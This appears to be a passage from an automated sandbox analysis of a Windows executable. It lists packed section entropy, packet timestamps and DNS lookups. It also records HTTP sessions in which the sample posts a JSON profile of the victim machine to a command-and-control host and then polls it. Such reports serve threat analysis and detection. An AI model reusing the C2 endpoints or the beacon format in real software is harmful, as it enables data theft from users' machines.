| | 0x706000 | 0x397000 | 0x200 | b17bcbd957425cf934e8c768fd9a90d6 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| jzrbpplf | 0xa9d000 | 0x1bb000 | 0x1ba400 | 9482944b40f8f385e82c157a793ec59c | False | 0.9945949556599774 | data | 7.956572353209662 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| qryisspl | 0xc58000 | 0x1000 | 0x400 | 448fbc271bba9c338fe30442c81ddcef | False | 0.814453125 | data | 6.2879535528387125 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .taggant | 0xc59000 | 0x3000 | 0x2200 | 4e432998396cb1e2da4a5b41682bba66 | False | 0.38786764705882354 | DOS executable (COM) | 4.170020158535745 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_MANIFEST | 0xc571dc | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402 |

| DLL | Import |
|---|---|
| kernel32.dll | lstrcpy |
                                              Jan 2, 2025 09:15:21.552898884 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.552982092 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.553101063 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.553133011 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.553201914 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.553211927 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.553222895 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.553292036 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.553303003 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.553313017 CET4970880192.168.2.7176.53.146.223
                                              Jan 2, 2025 09:15:21.553359985 CET4970880192.168.2.7176.53.146.223
                                              Jan 2, 2025 09:15:21.553399086 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.553447962 CET4970880192.168.2.7176.53.146.223
                                              Jan 2, 2025 09:15:21.553472042 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.553885937 CET4970880192.168.2.7176.53.146.223
                                              Jan 2, 2025 09:15:21.556751013 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.556802034 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.556813002 CET4970880192.168.2.7176.53.146.223
                                              Jan 2, 2025 09:15:21.556869030 CET4970880192.168.2.7176.53.146.223
                                              Jan 2, 2025 09:15:21.557030916 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.557086945 CET4970880192.168.2.7176.53.146.223
                                              Jan 2, 2025 09:15:21.557209969 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.557296991 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.557372093 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.557493925 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.557574034 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.558034897 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.558044910 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.558056116 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.558070898 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.558093071 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.558103085 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.558113098 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.558132887 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.558141947 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.558178902 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.558188915 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.558286905 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.558298111 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.558415890 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.558427095 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.558434963 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.558536053 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.558546066 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.558587074 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.558631897 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.558686972 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.558698893 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.558743000 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.558753967 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.558773041 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.558783054 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.558784962 CET4970880192.168.2.7176.53.146.223
                                              Jan 2, 2025 09:15:21.558859110 CET4970880192.168.2.7176.53.146.223
                                              Jan 2, 2025 09:15:21.558913946 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.558923960 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.558933020 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.558942080 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.558950901 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.558962107 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.558984041 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.558993101 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.559001923 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.559011936 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.559036016 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.559046984 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.559057951 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.559067011 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.559084892 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.559093952 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.559122086 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.559134960 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.559155941 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.559166908 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.559186935 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.559197903 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.559227943 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.559237003 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.559287071 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.559298992 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.559446096 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.559458971 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.559472084 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.559480906 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.559489965 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.559499979 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.559509039 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.559520006 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.559533119 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.559743881 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.559752941 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.561626911 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.561669111 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.561779022 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.561789989 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.561927080 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.561937094 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.563616037 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.563723087 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.563934088 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.563942909 CET4970880192.168.2.7176.53.146.223
                                              Jan 2, 2025 09:15:21.564018011 CET4970880192.168.2.7176.53.146.223
                                              Jan 2, 2025 09:15:21.564099073 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.564114094 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.564122915 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.564132929 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.564143896 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.564157009 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.564362049 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.564377069 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.564507961 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.564519882 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.564603090 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.564613104 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.564661026 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.564670086 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.564718008 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.564728022 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.564802885 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.564814091 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.564927101 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.564935923 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.564945936 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.564955950 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.564965963 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.564985991 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.564996004 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.565005064 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.565016031 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.565026045 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.565047026 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.565057039 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.565078020 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.565087080 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.565108061 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.565118074 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.565138102 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.565148115 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.565186024 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.565195084 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.565212965 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.565222979 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.565257072 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.565268040 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.565288067 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.565298080 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.565315008 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.565326929 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.565393925 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.565403938 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.565443039 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.565452099 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.568912029 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.568923950 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.568933964 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.568964005 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.568974972 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.568986893 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.569067001 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.569082022 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.569155931 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.569168091 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.569242001 CET4970880192.168.2.7176.53.146.223
                                              Jan 2, 2025 09:15:21.569264889 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.569276094 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.569297075 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.569302082 CET4970880192.168.2.7176.53.146.223
                                              Jan 2, 2025 09:15:21.569328070 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.569366932 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.569407940 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.569479942 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.569489956 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.569516897 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.569525957 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.569544077 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.569552898 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.569587946 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.569622993 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.569708109 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.569719076 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.569770098 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.569782019 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.569819927 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.569830894 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.569871902 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.569881916 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.569922924 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.569932938 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.569955111 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.569992065 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.570003033 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.570013046 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.570060968 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.570071936 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.570126057 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.570137024 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.570173025 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.570209026 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.570219040 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.570260048 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.570270061 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.570280075 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.570292950 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.570312023 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.570353985 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.570363998 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.570377111 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.574084997 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.574243069 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.574285984 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.574390888 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.574402094 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.574408054 CET4970880192.168.2.7176.53.146.223
                                              Jan 2, 2025 09:15:21.574477911 CET4970880192.168.2.7176.53.146.223
                                              Jan 2, 2025 09:15:21.574533939 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.574548006 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.574748039 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.574778080 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.574810982 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.574820995 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.574867010 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.574878931 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.574939966 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.574949980 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.575125933 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.575138092 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.575148106 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.575158119 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.575169086 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.575177908 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.575288057 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.575299025 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.575306892 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.575329065 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.575412989 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.575423956 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.575437069 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.575448990 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.575474977 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.575485945 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.575508118 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.575517893 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.575524092 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.575536013 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.575556993 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.575568914 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.575603008 CET8049708176.53.146.223192.168.2.7
                                              Jan 2, 2025 09:15:21.575613022 CET8049708176.53.146.223192.168.2.7
                                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                              Jan 2, 2025 09:15:16.789077044 CET | 57691 | 53 | 192.168.2.7 | 1.1.1.1
                                              Jan 2, 2025 09:15:16.789237976 CET | 57691 | 53 | 192.168.2.7 | 1.1.1.1
                                              Jan 2, 2025 09:15:16.796091080 CET | 53 | 57691 | 1.1.1.1 | 192.168.2.7
                                              Jan 2, 2025 09:15:16.796377897 CET | 53 | 57691 | 1.1.1.1 | 192.168.2.7
                                              Jan 2, 2025 09:15:19.954857111 CET | 63994 | 53 | 192.168.2.7 | 1.1.1.1
                                              Jan 2, 2025 09:15:19.954904079 CET | 63994 | 53 | 192.168.2.7 | 1.1.1.1
                                              Jan 2, 2025 09:15:20.881393909 CET | 53 | 63994 | 1.1.1.1 | 192.168.2.7
                                              Jan 2, 2025 09:15:21.032548904 CET | 53 | 63994 | 1.1.1.1 | 192.168.2.7
                                              Jan 2, 2025 09:15:24.744033098 CET | 62722 | 53 | 192.168.2.7 | 1.1.1.1
                                              Jan 2, 2025 09:15:24.744072914 CET | 62722 | 53 | 192.168.2.7 | 1.1.1.1
                                              Jan 2, 2025 09:15:25.415178061 CET | 53 | 62722 | 1.1.1.1 | 192.168.2.7
                                              Jan 2, 2025 09:15:25.599366903 CET | 53 | 62722 | 1.1.1.1 | 192.168.2.7
                                              Jan 2, 2025 09:15:26.539572954 CET | 62724 | 53 | 192.168.2.7 | 1.1.1.1
                                              Jan 2, 2025 09:15:26.539697886 CET | 62724 | 53 | 192.168.2.7 | 1.1.1.1
                                              Jan 2, 2025 09:15:27.178951025 CET | 53 | 62724 | 1.1.1.1 | 192.168.2.7
                                              Jan 2, 2025 09:15:27.322756052 CET | 53 | 62724 | 1.1.1.1 | 192.168.2.7
                                              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                              Jan 2, 2025 09:15:16.789077044 CET | 192.168.2.7 | 1.1.1.1 | 0xdcf1 | Standard query (0) | httpbin.org | A (IP address) | IN (0x0001) | false
                                              Jan 2, 2025 09:15:16.789237976 CET | 192.168.2.7 | 1.1.1.1 | 0x2c1 | Standard query (0) | httpbin.org | 28 | IN (0x0001) | false
                                              Jan 2, 2025 09:15:19.954857111 CET | 192.168.2.7 | 1.1.1.1 | 0x75d4 | Standard query (0) | home.fiveth5vs.top | A (IP address) | IN (0x0001) | false
                                              Jan 2, 2025 09:15:19.954904079 CET | 192.168.2.7 | 1.1.1.1 | 0x8076 | Standard query (0) | home.fiveth5vs.top | 28 | IN (0x0001) | false
                                              Jan 2, 2025 09:15:24.744033098 CET | 192.168.2.7 | 1.1.1.1 | 0x6470 | Standard query (0) | home.fiveth5vs.top | A (IP address) | IN (0x0001) | false
                                              Jan 2, 2025 09:15:24.744072914 CET | 192.168.2.7 | 1.1.1.1 | 0xe1c | Standard query (0) | home.fiveth5vs.top | 28 | IN (0x0001) | false
                                              Jan 2, 2025 09:15:26.539572954 CET | 192.168.2.7 | 1.1.1.1 | 0x8a14 | Standard query (0) | home.fiveth5vs.top | A (IP address) | IN (0x0001) | false
                                              Jan 2, 2025 09:15:26.539697886 CET | 192.168.2.7 | 1.1.1.1 | 0xc552 | Standard query (0) | home.fiveth5vs.top | 28 | IN (0x0001) | false
                                              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                              Jan 2, 2025 09:15:16.796377897 CET | 1.1.1.1 | 192.168.2.7 | 0xdcf1 | No error (0) | httpbin.org |  | 34.200.57.114 | A (IP address) | IN (0x0001) | false
                                              Jan 2, 2025 09:15:16.796377897 CET | 1.1.1.1 | 192.168.2.7 | 0xdcf1 | No error (0) | httpbin.org |  | 34.197.122.172 | A (IP address) | IN (0x0001) | false
                                              Jan 2, 2025 09:15:21.032548904 CET | 1.1.1.1 | 192.168.2.7 | 0x75d4 | No error (0) | home.fiveth5vs.top |  | 176.53.146.223 | A (IP address) | IN (0x0001) | false
                                              Jan 2, 2025 09:15:25.599366903 CET | 1.1.1.1 | 192.168.2.7 | 0x6470 | No error (0) | home.fiveth5vs.top |  | 176.53.146.223 | A (IP address) | IN (0x0001) | false
                                              Jan 2, 2025 09:15:27.322756052 CET | 1.1.1.1 | 192.168.2.7 | 0x8a14 | No error (0) | home.fiveth5vs.top |  | 176.53.146.223 | A (IP address) | IN (0x0001) | false
                                              • httpbin.org
                                              • home.fiveth5vs.top
                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              0 | 192.168.2.7 | 49708 | 176.53.146.223 | 80 | 7608 | C:\Users\user\Desktop\random(3).exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jan 2, 2025 09:15:21.044183016 CET | 12360 | OUT | POST /KhxTILlSHLygUudVWlQk1735537737 HTTP/1.1
                                              Host: home.fiveth5vs.top
                                              Accept: */*
                                              Content-Type: application/json
                                              Content-Length: 559948
                                              Data Ascii: { "ip": "8.46.123.189", "current_time": "8598217652914506517", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 50, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 556 }, { "name": "services.exe", "pid": 624 }, { "name": "lsass.exe", "pid": 632 }, { "name": "svchost.exe", "pid": 748 }, { "name": "fontdrvhost.exe", "pid": 772 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "svchost.exe", "pid": 864 }, { "name": "svchost.exe", "pid": 912 }, { "name": "dwm.exe", "pid": 976 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 704 }, { "name": "svchost.exe", "pid": 860 }, { "name": "svchost.exe" [TRUNCATED]
                                              Jan 2, 2025 09:15:24.683518887 CET | 138 | IN | HTTP/1.1 200 OK
                                              server: nginx/1.22.1
                                              date: Thu, 02 Jan 2025 08:15:24 GMT
                                              content-type: text/html; charset=utf-8
                                              content-length: 1
                                              Data Raw: 30
                                              Data Ascii: 0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              1 | 192.168.2.7 | 49728 | 176.53.146.223 | 80 | 7608 | C:\Users\user\Desktop\random(3).exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jan 2, 2025 09:15:25.627867937 CET | 98 | OUT | GET /KhxTILlSHLygUudVWlQk1735537737?argument=0 HTTP/1.1
                                              Host: home.fiveth5vs.top
                                              Accept: */*
                                              Jan 2, 2025 09:15:26.480895996 CET | 353 | IN | HTTP/1.1 404 NOT FOUND
                                              server: nginx/1.22.1
                                              date: Thu, 02 Jan 2025 08:15:26 GMT
                                              content-type: text/html; charset=utf-8
                                              content-length: 207
